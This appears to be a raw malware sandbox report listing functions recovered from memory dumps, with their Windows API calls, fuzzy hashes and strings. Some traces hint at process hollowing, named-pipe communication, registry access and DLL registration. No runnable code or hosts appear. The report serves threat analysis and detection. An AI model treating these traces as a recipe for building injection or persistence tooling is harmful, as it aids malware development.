Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
